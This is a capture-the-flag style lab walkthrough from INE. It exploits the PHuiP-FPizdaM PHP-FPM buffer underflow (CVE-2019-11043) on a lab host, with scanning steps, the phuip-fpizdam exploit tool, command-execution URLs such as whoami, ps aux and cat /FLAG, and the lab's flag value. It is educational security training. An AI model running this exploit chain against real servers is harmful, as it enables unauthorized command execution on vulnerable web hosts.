[CVE-2019–11043]: Exploiting the PHuiP-FPizdaM Vulnerability

In our lab walkthrough series, we go through selected lab exercises on our INE Platform. Subscribe or sign up for a 7-day, risk-free trial with INE and access this lab and a robust library covering the latest in Cyber Security, Networking, Cloud, and Data Science!

This bug shows how web vulnerability can lead to a memory corruption vulnerability (buffer underflow) resulting in OS command execution!

Reference: https://github.com/neex/phuip-fpizdam/blob/master/ZeroNights2019.pdf

Introduction

In 2019, an interesting bug was discovered in PHP-FPM. It was a buffer-underflow attack, and therefore, it happened to be a bug that required knowledge of both binary and web domains for successful exploitation (when trying it manually).

In this lab, we will learn how to detect and exploit the PHuiP-FPizdaM RCE vulnerability (CVE-2019–11043) in a realistic environment and leverage it for running arbitrary commands on the compromised server.

Lab Environment

In this lab writeup, learn to exploit a buffer underflow bug in PHP-FPM and leverage it to get OS command execution on the target machine located at http://demo.ine.local.

Objective: Exploit the PHuiP-FPizdaM vulnerability (CVE-2019–11043) and retrieve the flag!

Challenge Link: https://my.ine.com/CyberSecurity/courses/ebd09929/cyber-security-vulnerabilities-training-library/lab/6d8cbb0b-4378-436f-acea-f69cca9dd5f9

Instructions

The phuip-fpizdam tool is in /root/Desktop/tools directory.

Tools

The best tools for this lab are:

curl
Nmap
phuip-fpizdam
A web browser

Solution

Step 1: Open the lab link to access the Kali GUI instance.

Step 2: Check if the provided machine/domain is reachable.

Command:

ping -c3 demo.ine.local

The provided machine is reachable.

Step 3: Check open ports on the provided machine.

Command:

nmap -sS -sV demo.ine.local

Port 80 (HTTP) is open on the target machine.

Step 4: Explore the web pages hosted on the webserver.

Open the following URL in the browser:

URL: http://demo.ine.local

A coming soon page is hosted on the target server.

Step 5: Check the request headers for http://demo.ine.local and identify the vulnerability.

Let’s use curl to view the request headers:

Command:

curl -I demo.ine.local

Notice that the server is running Nginx (version 1.14.0) with PHP (version 7.1.33dev).

This means we are probably viewing the index.php page.

Open the following URL in the browser:

URL: http://demo.ine.local/index.php

Search the following query:

php/7.1.33 dev exploit

Notice the response page contains references of an RCE issue in PHP and has been assigned CVE-2019–11043. It applies to certain versions of PHP 7 installations running on NGINX with PHP-FPM enabled.

Open the Qualys post link and navigate to Vulnerability Scope & Details section:

It states that:

PHP versions 7.1.x below 7.1.33, 7.2.x below 7.2.24 and 7.3.x below 7.3.11 are vulnerable according to CVE-2019–11043.

Since NGINX is serving PHP pages, it must have PHP-FPM enabled. Also, we have identified the PHP version used by the webserver (version 7.1.33dev) to be vulnerable to the CVE mentioned above.

Step 6: Check the usage for the phuip-fpizdam tool.

Information:

The researcher who identified this issue had developed a tool named phuip-fpizdam to perform one-shot exploitation of this vulnerability.

The phuip-fpizdam tool is located in /root/Desktop/tools directory:

Commands:

ls /root/Desktop/tools

ls /root/Desktop/tools/phuip-fpizdam

Run this tool without any command-line arguments:

Command:

/root/Desktop/tools/phuip-fpizdam

This tool expects the target URL, and we can specify a number of flags to it.

Notice the — only-qsl flag. It helps in identifying if the server is vulnerable to this issue.

Step 7: Detect if the target web server is vulnerable.

We have already identified that the preconditions for this exploit match up perfectly (certain versions of PHP 7 running on NGINX with PHP-FPM enabled).

Now we can use the phuip-fpizdam tool to confirm if the target is vulnerable or not:

Command:

/root/Desktop/tools/phuip-fpizdam --only-qsl http://demo.ine.local/index.php

Notice the target server is reported to be vulnerable to the PHuiP-FPizdaM vulnerability.

Step 8: Exploit the vulnerability to gain code execution on the target server.

This time, we will run the phuip-fpizdam tool with the target URL and without any flags:

Command:

/root/Desktop/tools/phuip-fpizdam http://demo.ine.local/index.php

Notice the exploitation was successful. To run shell commands on the target server, we need to append the provided query parameter to the request URL.

Open the following URL in the web browser:

URL: http://demo.ine.local/index.php?a=/bin/sh+-c+%27which+which%27&

Nothing is returned on the page.

Refresh the page:

This time, we got back the results from the issued command.

Note: Chances are that you might have to refresh the URL a couple of times before you get any results. It is because several PHP-FPM workers are running on the server, and only some of them got infected. Therefore, only if the infected worker processes serve the request will our commands be executed. Otherwise, the commands won’t be executed.

Step 9: Run commands on the compromised web server.

Now that we have compromised the web server, we can run shell commands on it and perform some recon and enumeration.

Open the following URL to run the whoami command:

URL: http://demo.ine.local/index.php?a=whoami

We are running commands as the www-data user.

Inspect the process listing:

URL: http://demo.ine.local/index.php?a=ps%20aux

Notice the process listing is distorted. It is because the web browsers disregard the newline character and instead require the \<br /\> tag (line-break) to insert the line breaks. But since the output of the ps aux command contains newlines and not the \<br /\> tags, we see the output in a non-readable format.

We can check the page source instead (press CTRL+U) to view the output in a much more readable format:

Now the output looks good.

Note: As explained earlier, you might not get the output from the issued commands in one go and might have to resend your requests.

Check the current working directory:

URL: http://demo.ine.local/index.php?a=pwd

The current working directory is /var/www/html.

Check the list of files present in the current working directory (the webroot directory):

URL: http://demo.ine.local/index.php?a=ls%20-al

Step 10: Retrieve the flag from the target server.

Find the flag using the following command:

Command:

find / -iname *FLAG* 2>/dev/null

To issue this command on the server, open the following URL in the browser:

URL:

http://demo.ine.local/index.php?a=find / -iname *FLAG* 2>/dev/null

The flag is present in the /FLAG file.

Retrieve the flag:

URL: http://demo.ine.local/index.php?a=cat%20/FLAG

FLAG: 2867dd5248874bb7a510f6ab74318bda

Conclusion

With that, we conclude this interesting PHP-FPM (buffer-underflow) bug dubbed as PHuiP-FPizdaM.

We have learned how to detect and exploit this vulnerability using the phuip-fpizdam tool.

If you are curious about the intrinsic details, check out the detailed analysis done by the security researcher Orange Tsai on his blog.

References

Try this exploit for yourself! Subscribe or sign up for a 7-day, risk-free trial with INE to access this lab and a robust library covering the latest in Cyber Security, Networking, Cloud, and Data Science!